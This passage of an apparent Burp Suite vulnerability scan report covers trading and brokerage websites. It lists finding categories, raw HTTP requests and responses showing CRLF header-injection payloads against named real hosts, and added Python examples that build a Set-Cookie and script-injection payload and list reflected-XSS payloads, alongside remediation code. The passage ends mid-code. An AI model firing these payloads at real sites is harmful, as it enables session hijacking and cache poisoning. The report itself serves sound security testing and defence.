17.9. http://www.efutures.com/account/submitapp.php

17.10. http://www.facebook.com/connect/prompt_feed.php

17.11. http://www.facebook.com/dialog/feed

17.12. http://www.farrdirect.com/

17.13. http://www.farrdirect.com/hbooks.htm

17.14. http://www.futurestrading.com/

17.15. http://www.futurestrading.com/log-in.html

17.16. http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html

17.17. http://www.futurestrading.com/managed-futures.html

17.18. http://www.globalfutures.com/index.asp

17.19. http://www.globalfutures.com/resources/forex-newsitem.asp

17.20. http://www.globalfutures.com/resources/futures-newsitem.asp

17.21. http://www.globalfutures.com/resources/newsitem.asp

17.22. http://www.globalfutures.com/resources/newsletter.asp

17.23. http://www.interactivebrokers.com/en/accounts/advisors/advisorsMain.php

17.24. http://www.interactivebrokers.com/en/accounts/advisors/employeeTrackMain.php

17.25. http://www.interactivebrokers.com/en/accounts/brokers/brokerMain.php

17.26. http://www.interactivebrokers.com/en/accounts/closingAccount.php

17.27. http://www.interactivebrokers.com/en/accounts/institutions/fundMain.php

17.28. http://www.interactivebrokers.com/en/accounts/institutions/institutionalMain.php

17.29. http://www.interactivebrokers.com/en/accounts/legalDocuments/brokerPerformanceReports.php

17.30. http://www.interactivebrokers.com/en/accounts/legalDocuments/custIdentificationNotice.php

17.31. http://www.interactivebrokers.com/en/accounts/legalDocuments/homepageDisclosures.php

17.32. http://www.interactivebrokers.com/en/accounts/legalDocuments/privacy.php

17.33. http://www.interactivebrokers.com/en/general/about/about.php

17.34. http://www.interactivebrokers.com/en/general/about/awards.php

17.35. http://www.interactivebrokers.com/en/general/about/commentLetters.php

17.36. http://www.interactivebrokers.com/en/general/about/exchange_memberships.php

17.37. http://www.interactivebrokers.com/en/general/about/financials.php

17.38. http://www.interactivebrokers.com/en/general/about/ratingSandP.php

17.39. http://www.interactivebrokers.com/en/general/alpineHelp.php

17.40. http://www.interactivebrokers.com/en/general/bingoHelp.php

17.41. http://www.interactivebrokers.com/en/general/contact/feedbackForm.php

17.42. http://www.interactivebrokers.com/en/general/education/OptPriceAgreement.php

17.43. http://www.interactivebrokers.com/en/general/education/UserGuides.php

17.44. http://www.interactivebrokers.com/en/general/education/comparebrokers.php

17.45. http://www.interactivebrokers.com/en/general/education/hdi_Add_Products_Market_Data.php

17.46. http://www.interactivebrokers.com/en/general/education/hdi_Deposit_Withdraw_Transfer.php

17.47. http://www.interactivebrokers.com/en/general/education/hdi_bonds.php

17.48. http://www.interactivebrokers.com/en/general/education/hdi_borrow_lend.php

17.49. http://www.interactivebrokers.com/en/general/education/hdi_check_my_BAP.php

17.50. http://www.interactivebrokers.com/en/general/education/hdi_port_margin.php

17.51. http://www.interactivebrokers.com/en/general/education/hdi_trade_at_IB.php

17.52. http://www.interactivebrokers.com/en/general/education/highlights.php

17.53. http://www.interactivebrokers.com/en/general/education/pdfnotes/WN-TWSEarningsEvents.php

17.54. http://www.interactivebrokers.com/en/general/education/webinars.php

17.55. http://www.interactivebrokers.com/en/general/education/why_ib.php

17.56. http://www.interactivebrokers.com/en/general/notifications/ibchanges.php

17.57. http://www.interactivebrokers.com/en/general/platinumHelp.php

17.58. http://www.interactivebrokers.com/en/general/poll/ibconsultants.php

17.59. http://www.interactivebrokers.com/en/general/poll/poll.php

17.60. http://www.interactivebrokers.com/en/general/whyib/PDF-Education.php

17.61. http://www.interactivebrokers.com/en/general/whyib/PDF-GlobalOfferings.php

17.62. http://www.interactivebrokers.com/en/general/whyib/PDF-RiskManagement.php

17.63. http://www.interactivebrokers.com/en/general/whyib/PDF-SuperiorTradingTechnology.php

17.64. http://www.interactivebrokers.com/en/ibglobal_sites.php

17.65. http://www.interactivebrokers.com/en/p.php

17.66. http://www.interactivebrokers.com/en/pagemap/pagemap_APISolutions.php

17.67. http://www.interactivebrokers.com/en/pagemap/pagemap_about.php

17.68. http://www.interactivebrokers.com/en/pagemap/pagemap_accounts.php

17.69. http://www.interactivebrokers.com/en/pagemap/pagemap_demo.php

17.70. http://www.interactivebrokers.com/en/pagemap/pagemap_education.php

17.71. http://www.interactivebrokers.com/en/pagemap/pagemap_exchanges_around_world.php

17.72. http://www.interactivebrokers.com/en/pagemap/pagemap_fees.php

17.73. http://www.interactivebrokers.com/en/pagemap/pagemap_hdi.php

17.74. http://www.interactivebrokers.com/en/pagemap/pagemap_helpcontacts.php

17.75. http://www.interactivebrokers.com/en/pagemap/pagemap_login.php

17.76. http://www.interactivebrokers.com/en/pagemap/pagemap_mobiletrading.php

17.77. http://www.interactivebrokers.com/en/pagemap/pagemap_newaccounts.php

17.78. http://www.interactivebrokers.com/en/pagemap/pagemap_statements.php

17.79. http://www.interactivebrokers.com/en/pagemap/pagemap_trading.php

17.80. http://www.interactivebrokers.com/en/pagemap/pagemap_trading_platforms.php

17.81. http://www.interactivebrokers.com/en/pagemap/pagemap_webinars.php

17.82. http://www.interactivebrokers.com/en/pagemap/pagemap_whyib.php

17.83. http://www.interactivebrokers.com/en/site_map.php

17.84. http://www.interactivebrokers.com/en/software/downloadPlugin.php

17.85. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-FxTrader.php

17.86. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-StatementsandReports.php

17.87. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-TechAnalytics.php

17.88. http://www.interactivebrokers.com/en/software/systemStatus.php

17.89. http://www.interactivebrokers.com/en/software/twsDisclaimer.php

17.90. http://www.interactivebrokers.com/en/software/twsPrevious.php

17.91. http://www.interactivebrokers.com/en/software/twsTutorial.php

17.92. http://www.interactivebrokers.com/en/trading/holidayAndExpirationCalendar.php

17.93. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-Forex.php

17.94. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-OptionsDesk.php

17.95. http://www.interactivebrokers.com/en/trading/productsupdates.php

17.96. http://www.interactivebrokers.com/futures/images/sitetemplate/printHeader.gif

17.97. http://www.interactivebrokers.com/html/help/contact.html

17.98. https://www.interactivebrokers.com/cstools/ib_app_help/

17.99. https://www.interactivebrokers.com/jsp/Registration_v3/showScreenPreReg.jsp

17.100. http://www.optioneducation.net/select/direct_login.asp

17.101. http://www.pfgbest.com/link/

17.102. http://www.pfgbest.com/toolkit/

17.103. http://www.transworldfutures.com/Commodity.html

17.104. http://www.transworldfutures.com/quotes.html

17.105. http://www.youtube.com/results

18. File upload functionality

19. TRACE method is enabled

19.1. https://cwt1.interactivebrokers.com/

19.2. http://picasaweb.google.com/

19.3. http://pixel.everesttech.net/

19.4. http://shared.websol.barchart.com/

19.5. http://tracking.hubspot.com/

19.6. http://transworld.websol.barchart.com/

19.7. http://webstation.barchart.com/

19.8. http://www.adventuresinsoftware.com/

19.9. https://www.barchart.com/

19.10. http://www.efutures.com/

19.11. https://www.efutures.com/

19.12. http://www.farrdirect.com/

19.13. http://www.interactivebrokers.co.uk/

19.14. http://www.pfgbest.com/

19.15. http://www.zumo.com/

19.16. http://www2.daytrade4less.com/

20. Email addresses disclosed

20.1. http://360.sorensonmedia.com/api/getPlayerData

20.2. http://360.sorensonmedia.com/redirector/fetchFile

20.3. https://account.optionsxpress.com/OpenAccount/Index

20.4. https://account.optionsxpress.com/inc/general.js

20.5. https://account.optionsxpress.com/inc/s_code.js

20.6. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

20.7. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

20.8. http://ibkb.interactivebrokers.com/node/1071

20.9. http://ibkb.interactivebrokers.com/node/1132

20.10. http://images.google.com/support/bin/answer.py

20.11. http://maps.google.com/maps

20.12. http://translate.google.com/

20.13. http://www.efutures.com/account/submitapp.php

20.14. http://www.farrdirect.com/

20.15. http://www.google.com/advanced_search

20.16. http://www.google.com/finance

20.17. http://www.google.com/preferences

20.18. http://www.google.com/quality_form

20.19. http://www.google.com/reader/view/

20.20. http://www.google.com/support/websearch/bin/answer.py

20.21. http://www.google.com/webhp

20.22. http://www.interactivebrokers.com/download/en/ASX_ETF_March_09.pdf

20.23. http://www.interactivebrokers.com/download/en/ASX_IB_Options_March_17.pdf

20.24. http://www.interactivebrokers.com/download/en/ASX_Index_Futures_FO_March.pdf

20.25. http://www.interactivebrokers.com/download/en/CME_Trading_Related_Markets_Equities_Gold.pdf

20.26. http://www.interactivebrokers.com/download/en/ISE_FX_Greeks_121207.pdf

20.27. http://www.interactivebrokers.com/download/en/ISE_FX_Options.pdf

20.28. http://www.interactivebrokers.com/download/en/PHLX_IB012908jc.pdf

20.29. http://www.interactivebrokers.com/download/en/SGX-Asian_Option_opportunity.pdf

20.30. http://www.interactivebrokers.com/en/accounts/advisors/employeeTrackMain.php

20.31. http://www.interactivebrokers.com/en/general/education/webinars.php

20.32. http://www.interactivebrokers.com/en/p.php

20.33. http://www.interactivebrokers.com/en/p.php

20.34. http://www.interactivebrokers.com/en/p.php

20.35. http://www.interactivebrokers.com/en/p.php

20.36. http://www.interactivebrokers.com/en/p.php

20.37. http://www.interactivebrokers.com/en/software/systemStatus.php

20.38. https://www.interactivebrokers.com/Universal/Templates/javascript/sha1.js

20.39. https://www.interactivebrokers.com/Universal/Templates/jquery.bgiframe.js

20.40. https://www.interactivebrokers.com/sso/Login

20.41. https://www.interactivebrokers.com/sso/Templates/javascript/sha1.js

20.42. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

20.43. http://www.optionsxpress.com/inc/general.js

20.44. http://www.optionsxpress.com/inc/js/library.js

20.45. http://www.optionsxpress.com/inc/js/stats.js

20.46. https://www.optionsxpress.com/welcome.asp

20.47. http://www.pfgbest.com/common/js/script.aculo.us/dragdrop.js

20.48. http://www.pfgbest.com/common/js/script.aculo.us/prototype.js

20.49. http://www.pfgbest.com/link/

20.50. http://www.transworldfutures.com/

20.51. http://www.transworldfutures.com/Commodity.html

20.52. http://www.transworldfutures.com/about.html

20.53. http://www.transworldfutures.com/account-types.html

20.54. http://www.transworldfutures.com/accountstatement.html

20.55. http://www.transworldfutures.com/best_direct.html

20.56. http://www.transworldfutures.com/best_direct_MT4.html

20.57. http://www.transworldfutures.com/best_direct_web.html

20.58. http://www.transworldfutures.com/commission_rates.html

20.59. http://www.transworldfutures.com/commodity-education.html

20.60. http://www.transworldfutures.com/contactus.html

20.61. http://www.transworldfutures.com/course_introduction.html

20.62. http://www.transworldfutures.com/css/css.css

20.63. http://www.transworldfutures.com/css/cssMenu.css

20.64. http://www.transworldfutures.com/currenex.html

20.65. http://www.transworldfutures.com/customer_support.html

20.66. http://www.transworldfutures.com/disaster_recovery.html

20.67. http://www.transworldfutures.com/favicon.ico

20.68. http://www.transworldfutures.com/first_notice_last_trading_day.html

20.69. http://www.transworldfutures.com/free-papertrading.html

20.70. http://www.transworldfutures.com/fund_your_account.html

20.71. http://www.transworldfutures.com/glossary.html

20.72. http://www.transworldfutures.com/index.html

20.73. http://www.transworldfutures.com/intro_to_futures.html

20.74. http://www.transworldfutures.com/open-an-account.html

20.75. http://www.transworldfutures.com/privacy_notice.html

20.76. http://www.transworldfutures.com/pro_trader.html

20.77. http://www.transworldfutures.com/quotes.html

20.78. http://www.transworldfutures.com/simulated_trading.html

20.79. http://www.transworldfutures.com/strategy-exchange.html

20.80. http://www.transworldfutures.com/strategy-runner.html

20.81. http://www.transworldfutures.com/trading_exchanges.html

20.82. http://www.transworldfutures.com/trading_platforms.html

20.83. http://www.transworldfutures.com/vocabulary.html

20.84. http://www.transworldfutures.com/weather.html

20.85. http://www.transworldfutures.com/web.php

21. Private IP addresses disclosed

21.1. http://www.facebook.com/connect/prompt_feed.php

21.2. http://www.facebook.com/dialog/feed

21.3. http://www.facebook.com/sharer.php

21.4. http://www.google.com/sdch/StnTz5pY.dct

22. Credit card numbers disclosed

22.1. http://www.interactivebrokers.com/download/en/ASX_ETF_March_09.pdf

22.2. http://www.interactivebrokers.com/download/en/ASX_IB_Options_March_17.pdf

22.3. http://www.interactivebrokers.com/download/en/ASX_Index_Futures_FO_March.pdf

22.4. http://www.interactivebrokers.com/download/en/ISE_FX_Greeks_121207.pdf

22.5. http://www.interactivebrokers.com/download/en/OIC_Modified_Collar.pdf

22.6. http://www.interactivebrokers.com/download/en/PHLX_IB012908jc.pdf

22.7. http://www.interactivebrokers.com/download/en/SGX_Apex50_Part1.pdf

22.8. http://www.interactivebrokers.com/download/en/Technical_Analysis.pdf

22.9. http://www.transworldfutures.com/pdf/historicalcharts.pdf

23. Robots.txt file

23.1. https://account.optionsxpress.com/OpenAccount/Index

23.2. https://adwords.google.com/um/StartNewLogin

23.3. http://cdn-static.viddler.com/crossdomain.xml

23.4. http://cdn-thumbs.viddler.com/crossdomain.xml

23.5. http://cdn.static.viddler.com/flash/as3/full-publisher.swf

23.6. https://docs.google.com/

23.7. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

23.8. http://go.microsoft.com/fwlink/

23.9. http://groups.google.com/groups

23.10. http://images.google.com/support/bin/answer.py

23.11. http://jqueryui.com/themeroller/

23.12. http://l.addthiscdn.com/live/t00/200lo.gif

23.13. https://mail.google.com/mail/

23.14. http://maps.google.com/maps

23.15. http://news.google.com/news/story

23.16. https://online.optionsxpress.ca/new_account.asp

23.17. https://online.optionsxpress.com.sg/new_account.asp

23.18. https://online.optionsxpress.eu/new_account.asp

23.19. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

23.20. http://picasaweb.google.com/lh/view

23.21. http://pixel.everesttech.net/2164/cq

23.22. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.23. http://scholar.google.com/scholar

23.24. https://sites.google.com/

23.25. http://stats.optionsxpress.com/b/ss/oxpressprodus/1/H.20.3/s83347698624711

23.26. http://toolbarqueries.clients.google.com/tbproxy/af/query

23.27. http://translate.google.com/

23.28. http://translate.googleapis.com/translate_a/l

23.29. http://webcache.googleusercontent.com/search

23.30. http://www.adobe.com/shockwave/download/download.cgi

23.31. https://www.barchart.com/register/realtime/

23.32. http://www.facebook.com/sharer.php

23.33. http://www.farrdirect.com/

23.34. http://www.futurestrading.com/

23.35. http://www.globalfutures.com/index.asp

23.36. http://www.google-analytics.com/__utm.gif

23.37. http://www.google.com/search

23.38. https://www.google.com/calendar

23.39. http://www.googleadservices.com/pagead/aclk

23.40. http://www.invest-store.com/commoditybooks/

23.41. http://www.optioneducation.net/select/direct_login.asp

23.42. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

23.43. https://www.optionsxpress.com/new_account.asp

23.44. https://www.optionsxpress.com.au/new_account.asp

23.45. https://www.pfgboss.com/Default.aspx

23.46. http://www.thefinancials.com/syndicated/DTS/DTSs_Commodities.js

23.47. http://www.usda.gov/wps/portal/!ut/p/_s.7_0_A/7_0_1OB

23.48. http://www.viddler.com/player/cc4ac375/

23.49. http://www.youtube.com/results

23.50. http://www.zumo.com/

24. Cacheable HTTPS response

24.1. https://account.optionsxpress.com/OpenAccount/Index

24.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

24.3. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

24.4. https://seal.verisign.com/getseal

24.5. https://www.barchart.com/register/realtime/

24.6. https://www.cqgtrader.com/Languages/USEng/oldBrowser.asp

24.7. https://www.efutures.com/cgi-bin/open_account.pl

24.8. https://www.efutures.com/favicon.ico

24.9. https://www.interactivebrokers.com/Universal/servlet/com.ib.xyztags.AuthHandler2

24.10. https://www.interactivebrokers.com/sso/Authenticator

24.11. https://www.optionsxpress.com/downloads/riskstoc.pdf

24.12. https://www.optionsxpress.com/welcome.asp

24.13. https://www.pfgboss.com/Default.aspx

24.14. https://www.secureclient5.ranweb.com/login/login.asp

24.15. https://www.secureclient5.ranweb.com/login/ranweb.asp

25. HTML does not specify charset

25.1. http://206.106.137.34/php/ticker/getFXMDdata.php

25.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

25.3. http://jqueryui.com/themeroller/

25.4. http://www.algoadvantage.com/

25.5. http://www.algoadvantage.com/Home.php

25.6. http://www.interactivebrokers.com/download/efp.html

25.7. http://www.interactivebrokers.com/en/general/education/webinars/cme-3-6-2006.html

25.8. http://www.interactivebrokers.com/futures/

25.9. http://www.interactivebrokers.com/mkt/ticker/getFXMDdata.php

25.10. http://www.interactivebrokers.com/wml/

25.11. http://www.invest-store.com/commoditybooks/

25.12. http://www.mobiletws.com/mobile/default.php

25.13. http://www.mobiletws.com/mobile/mobiles.php

25.14. https://www.secureclient5.ranweb.com/login/login.asp

25.15. https://www.secureclient5.ranweb.com/login/ranweb.asp

26. Content type incorrectly stated

26.1. http://206.106.137.34/php/ticker/getFXMDdata.php

26.2. http://360.sorensonmedia.com/7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

26.3. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

26.4. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

26.5. http://pfgbest.app5.hubspot.com/salog.js.aspx

26.6. https://seal.verisign.com/getseal

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js

26.8. http://shared.websol.barchart.com/lookup/qquote.php

26.9. http://shared.websol.barchart.com/quotes/default.php

26.10. http://shared.websol.barchart.com/text/disclaimer.php

26.11. http://transworld.websol.barchart.com/main.php

26.12. http://www.algoadvantage.com/favicon.ico

26.13. http://www.algoadvantage.com/fonts/helveticaneue-roman-webfont.woff

26.14. http://www.efutures.com/favicon.ico

26.15. https://www.efutures.com/favicon.ico

26.16. http://www.interactivebrokers.co.uk/contract_info/v3.7/js/FormFilter.js

26.17. http://www.interactivebrokers.co.uk/contract_info/v3.7/js/cicObj_en.js

26.18. http://www.interactivebrokers.com/images/sitetemplate/new/mnTempFlag_UK.gif

26.19. http://www.interactivebrokers.com/mkt/ticker/getFXMDdata.php

26.20. https://www.interactivebrokers.com/sso/Login

26.21. https://www.secureclient5.ranweb.com/login/ranweb.asp

26.22. http://www2.daytrade4less.com/livesupport/image.php

26.23. http://www2.daytrade4less.com/livesupport/scroll_image.php



1. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
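The following is an added example, not part of the XSS.CX report or of Burp's issue text. It models the flaw behind issues 1.1 and 1.2 (a percent-decoded request parameter concatenated into the Location header, so an encoded CR LF splits the response) and then applies the remediation rule above by refusing any header value that contains a character below 0x20. The report's probes only inject a bare line; the constructed payload here goes further, as the background text describes, adding a Set-Cookie header and a blank line followed by an attacker-chosen body. Hostnames, paths and the handler shape are assumptions, not the report's targets or their code.

```python
"""Added example, not part of the XSS.CX report or of Burp's issue text.

Models the flaw behind issues 1.1 and 1.2 (decoded parameter copied into the
Location header) and the remediation (reject control characters before the
value reaches a header). Hostnames and paths are placeholders.
"""
from urllib.parse import parse_qs

CRLF = "\r\n"

# Constructed attacker query string (assumption, not captured traffic).
# %0d%0a is CR LF: the first one starts a new Set-Cookie header, the second,
# doubled, ends the headers so the rest becomes an attacker-controlled body.
MALICIOUS_QUERY = (
    "url=http%3A//www.example.com/landing.aspx%3Fcmpid%3Dabc"
    "%0d%0aSet-Cookie:%20session=attacker"
    "%0d%0a%0d%0a<html><script>alert(1)</script></html>"
)
BENIGN_QUERY = "url=http%3A//www.example.com/landing.aspx%3Fcmpid%3Dabc"


def _url_param(query):
    # parse_qs percent-decodes, so %0d%0a is a real CR LF from here on
    return parse_qs(query, keep_blank_values=True).get("url", [""])[0]


def vulnerable_redirect(query):
    """Builds the 302 the way the affected endpoints appear to: the decoded
    parameter goes straight into Location with no validation."""
    head = ("HTTP/1.1 302 Found" + CRLF
            + "Location: " + _url_param(query) + CRLF
            + "Content-Length: 0" + CRLF + CRLF)
    return head.encode("latin-1")


def parse_response(raw):
    """Splits a raw response into (status line, headers, body) the way a
    simple client or caching proxy does: one header per CRLF-terminated
    line, headers end at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip(), []).append(value.strip())
    return lines[0], headers, body


class HeaderInjectionError(ValueError):
    """Raised instead of 'sanitising': bad input fails closed."""


def safe_header_value(value, max_len=2048):
    """Remediation: a header value may not contain CR, LF, NUL or any other
    C0 control character (or DEL), and must stay a sensible length."""
    if len(value) > max_len:
        raise HeaderInjectionError("header value too long")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise HeaderInjectionError("control character in header value")
    return value


def safe_redirect(query):
    """Same redirect with the check applied before the value reaches a header."""
    target = safe_header_value(_url_param(query))
    head = ("HTTP/1.1 302 Found" + CRLF
            + "Location: " + target + CRLF
            + "Content-Length: 0" + CRLF + CRLF)
    return head.encode("latin-1")


def rejects(query):
    """True if the hardened handler refuses the query outright."""
    try:
        safe_redirect(query)
    except HeaderInjectionError:
        return True
    return False


if __name__ == "__main__":
    status, headers, body = parse_response(vulnerable_redirect(MALICIOUS_QUERY))
    print(status, headers, body)
    print("hardened handler rejects payload:", rejects(MALICIOUS_QUERY))
```

Parsing the vulnerable handler's output shows the injected Set-Cookie header as a separate, fully formed header and the attacker's HTML as the response body, which is exactly what a caching proxy in front of the application would store. The hardened handler raises rather than stripping the offending characters, so a rejected request never produces a partially cleaned redirect.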


1.1. http://pixel.everesttech.net/2164/cq [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2164/cq

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 3b8a5%0d%0aff4bfa8fe85 was submitted in the url parameter. This caused a response containing an injected HTTP header.

Request

GET /2164/cq?ev_sid=3&ev_ln=futures%20options&ev_crx=7551788913&ev_mt=b&ev_n=g&ev_ltx=&ev_pl=&url=http%3A//www.optionsxpress.com/promos/experience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus233050073b8a5%0d%0aff4bfa8fe85 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Set-Cookie: everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR%00a6495"%20a%3db%203d6afe418bc; path=/; domain=.everesttech.net; expires=Fri, 13-Sep-2030 06:04:37 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus233050073b8a5
ff4bfa8fe85
&ef_id=zqROZUBXyFQAAIdR%00a6495"%20a%3db%203d6afe418bc:20110908192437:s
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.optionsxpress.com/promos/experience_
...[SNIP]...

1.2. http://www.interactivebrokers.co.uk/contract_info/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.interactivebrokers.co.uk
Path:   /contract_info/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload cd855%0d%0a236a662b0c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /contract_info/index.php?cd855%0d%0a236a662b0c=1 HTTP/1.1
Host: www.interactivebrokers.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:47:35 GMT
Server: Apache
Accept-Ranges: bytes
Location: http://www.interactivebrokers.co.uk/contract_info/v3.7/index.php?cd855
236a662b0c
=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


2. Cross-site scripting (reflected)
There are 31 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, a personal name should be short and consist of alphabetical and a small range of typographical characters; an email address should match a well-defined regular expression), and input which fails validation should be rejected, not sanitised. Second, user input should be HTML-encoded at any point where it is copied into application responses, replacing all HTML metacharacters, including < > " ' and =, with the corresponding HTML entities. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
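The following is an added example, not part of the XSS.CX report or of Burp's issue text, and not code from any of the affected sites. It takes the three reflection contexts that issues 2.1, 2.2 and 2.3 below demonstrate (plain text between tags, a JavaScript rest-of-line comment, and a double-quoted JavaScript string) and shows the output-encoding layer of the remediation above applied to each, alongside a small scanner that decides whether the report's own payloads land in code position. The page template, the placeholder hostnames and the second `firmName` assignment are assumptions modelled on the report's responses; the payload strings are the report's, percent-decoded.

```python
"""Added example, not part of the XSS.CX report or of Burp's issue text.

Reproduces the three reflection contexts of issues 2.1-2.3 in a tiny page
template and applies per-context output encoding. The template is an
assumption modelled on the report's responses, not the sites' real code.
"""
import html
import json
import re

# The report's payloads (issues 2.1, 2.2, 2.3), percent-decoded as the
# server sees them. %0a in 2.2 is a real newline.
PAYLOAD_TEXT = "4cc9f<script>alert(1)</script>c8d9cd7cbe2"
PAYLOAD_COMMENT = "b5a37\nalert(1)//18aaa9ddc45"
PAYLOAD_STRING = '5b37e";alert(1)//81efc02e54c'


def vulnerable_page(vguid, firm):
    """Raw input concatenated into each context, as the affected responses do:
    between tags, inside a // comment, and inside a "..." string literal."""
    return (
        f"<p>Video {vguid}</p>\n"
        "<script>\n"
        f'// var firmName = "{firm}";\n'
        f'var firmName = "{firm}";\n'
        "</script>\n"
    )


def html_text(value):
    """Entity-encode for HTML text and quoted-attribute contexts:
    < > & " ' all become entities."""
    return html.escape(value, quote=True)


def js_string(value):
    """Encode a value as a JavaScript string literal that is safe inside an
    HTML <script> block. json.dumps escapes quotes, backslashes and control
    characters such as \\n and \\r; with ensure_ascii it also escapes
    U+2028/U+2029. The extra replacements keep '</script>' or '<!--' in the
    data from being seen by the HTML parser, which runs before the JS parser."""
    encoded = json.dumps(value, ensure_ascii=True)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def safe_page(vguid, firm):
    """Same page with encoding per context. The comment line is removed
    rather than encoded: user data has no business inside a script comment."""
    return (
        f"<p>Video {html_text(vguid)}</p>\n"
        "<script>\n"
        f"var firmName = {js_string(firm)};\n"
        "</script>\n"
    )


def script_tag_count(page):
    """HTML context check: a page with one intended script block should
    contain exactly one '<script' once encoding is applied."""
    return page.lower().count("<script")


SCRIPT_BLOCK = re.compile(r"<script>(.*?)</script>", re.S)


def js_code_outside_strings(script):
    """Minimal scanner for a script body: returns only the characters the
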